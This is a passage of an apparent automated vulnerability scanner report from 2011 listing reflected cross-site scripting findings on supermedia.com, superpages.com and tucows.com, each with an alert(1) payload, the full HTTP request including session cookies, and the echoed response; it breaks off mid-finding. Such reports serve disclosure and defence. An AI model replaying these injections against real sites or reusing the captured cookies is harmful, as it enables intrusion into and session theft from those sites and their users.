GET /spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow%00a5103"%3bb8f83f9f764 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763571|check#true#1296761771; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:47:13 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 22588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
r="";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id 'loginact-flow.a5103";b8f83f9f764' found; the flows available are: array<String>
...[SNIP]...

1.230. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39e64"%3balert(1)//5b99acdfcf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39e64";alert(1)//5b99acdfcf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /spportal/spportalFlow.do?'"--></style></script><script>alert(0x000043)</script>&39e64"%3balert(1)//5b99acdfcf8=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; trafficSource=default; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; mbox=check#true#1296759729|session#1296759634912-2644#1296761529; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:18:59 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...
nable to extract the flow definition id parameter: make sure the client provides the '_flowId' parameter as input or set the 'defaultFlowId' property; the parameters provided in this request are: map['39e64";alert(1)//5b99acdfcf8' ->
...[SNIP]...

1.231. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631c1"><script>alert(1)</script>026bbe791e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?631c1"><script>alert(1)</script>026bbe791e4=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:52 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:52 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<link media="screen, projection" type="text/css" HREF="http://www.superpages.com/css/header.css?SRC=&631c1"><script>alert(1)</script>026bbe791e4=1" rel="stylesheet" />
...[SNIP]...

1.232. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f46'-alert(1)-'8e1de3e7335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a8f46'-alert(1)-'8e1de3e7335=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:54 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:54 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&a8f46'-alert(1)-'8e1de3e7335=1" rel="nofollow">
...[SNIP]...

1.233. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bd053--><script>alert(1)</script>e1950324e3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?bd053--><script>alert(1)</script>e1950324e3f=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:59 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:59 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<a href="?SRC=&bd053--><script>alert(1)</script>e1950324e3f=1#" rel="nofollow">
...[SNIP]...

1.234. http://www.superpages.com/inc/social/soc.php [cg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/soc.php

Issue detail

The value of the cg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48986"%3balert(1)//3db88e4ace3 was submitted in the cg parameter. This input was echoed as 48986";alert(1)//3db88e4ace3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/soc.php?cg=3,24,0,1,1,2,3,8,948986"%3balert(1)//3db88e4ace3&ml=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.superpages.com

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:19:13 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:34:13 GMT;path=/

var IE = document.all?true:false
if (!IE) document.captureEvents(Event.MOUSEMOVE)
document.onmousemove = getMouseXY;
var tempX = 0
var tempY = 0
function getMouseXY(e) {
if (IE) { // grab the x-y po
...[SNIP]...
<a target=\"_blank\" onclick=\"sp_soclink_click_track('')\" href=\"http://www.superpages.com/inc/social/sln.php?n=948986";alert(1)//3db88e4ace3&t="+ urlencode(document.title) +"&u="+ urlencode(location.href) +"&s=1\" title=\"\">
...[SNIP]...

1.235. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2e8a"-alert(1)-"2f831598e8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?e2e8a"-alert(1)-"2f831598e8d=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/?e2e8a"-alert(1)-"2f831598e8d=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.236. http://www.tucows.com/about.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f530"-alert(1)-"6001743e8c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about.html8f530"-alert(1)-"6001743e8c7 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/about.html8f530"-alert(1)-"6001743e8c7";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.237. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf95a"-alert(1)-"9164bc1eed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about.html?cf95a"-alert(1)-"9164bc1eed8=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 32110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/about.html?cf95a"-alert(1)-"9164bc1eed8=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.238. http://www.tucows.com/advertise.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5253"-alert(1)-"eb5b61b7f5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise.htmla5253"-alert(1)-"eb5b61b7f5a HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/advertise.htmla5253"-alert(1)-"eb5b61b7f5a";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.239. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff349"-alert(1)-"f7b0a9fb104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertise.html?ff349"-alert(1)-"f7b0a9fb104=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:28:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 2;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/advertise.html?ff349"-alert(1)-"f7b0a9fb104=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.240. http://www.tucows.com/affiliate/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5278d"-alert(1)-"005c7cc4526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate5278d"-alert(1)-"005c7cc4526/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/affiliate5278d"-alert(1)-"005c7cc4526/index.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.241. http://www.tucows.com/affiliate/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd2c"-alert(1)-"15b6c2e9e37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.html5dd2c"-alert(1)-"15b6c2e9e37 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:29:33 GMT
Server: Apache/2.2.14 (Ubuntu)
